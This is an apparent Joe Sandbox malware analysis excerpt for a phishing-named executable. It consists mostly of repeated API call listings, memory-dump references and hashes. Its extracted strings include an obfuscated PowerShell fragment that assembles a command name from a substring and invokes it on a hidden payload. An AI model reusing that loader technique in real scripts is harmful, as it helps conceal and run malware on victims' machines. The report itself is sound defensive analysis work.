                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                  • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                  • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                  • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                  • Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
                  • Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                  • Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A
                  APIs
                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                  • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                  • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                  • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                  APIs
                  • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                  • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                  • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                  • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                  APIs
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                  • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                  • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                  • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                  APIs
                  • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CallbackDispatcherUser
                  • String ID:
                  • API String ID: 2492992576-0
                  • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                  • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                  • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                  • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                  APIs
                  • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                  • GetDlgItem.USER32(?,00000408), ref: 00404B31
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                  • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                  • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                  • DeleteObject.GDI32(00000000), ref: 00404C04
                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                  • ShowWindow.USER32(?,00000005), ref: 00404D5E
                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                  • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                  • GlobalFree.KERNEL32(?), ref: 00404F3E
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                  • ShowWindow.USER32(?,00000000), ref: 004050DD
                  • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                  • ShowWindow.USER32(00000000), ref: 004050EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                  • String ID: $M$N
                  • API String ID: 1638840714-813528018
                  • Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                  • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                  • Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                  • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                  APIs
                  • GetDlgItem.USER32(?,000003FB), ref: 00404617
                  • SetWindowTextW.USER32(00000000,?), ref: 00404641
                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                  • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                  • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
                  • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                    • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061DF
                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                    • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061F3
                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00406206
                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                  Strings
                  • C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00404718
                  • A, xrefs: 004046EB
                  • : Completed, xrefs: 00404729, 0040472E, 00404739
                  • ';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) ", xrefs: 004045E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                  • String ID: ';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "$: Completed$A$C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes
                  • API String ID: 2246997448-640553702
                  • Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                  • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                  • Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                  • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                  APIs
                  • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                  Strings
                  • C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen, xrefs: 004020F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CreateInstance
                  • String ID: C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen
                  • API String ID: 542301482-3354442963
                  • Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                  • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                  • Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                  • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  • Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                  • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                  • Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                  • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                  APIs
                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                  • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                  • GetSysColor.USER32(?), ref: 004043AA
                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                  • lstrlenW.KERNEL32(?), ref: 004043CB
                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                  • GetDlgItem.USER32(?,0000040A), ref: 00404446
                  • SendMessageW.USER32(00000000), ref: 0040444D
                  • GetDlgItem.USER32(?,000003E8), ref: 00404478
                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                  • SetCursor.USER32(00000000), ref: 004044CC
                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                  • SetCursor.USER32(00000000), ref: 004044F0
                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
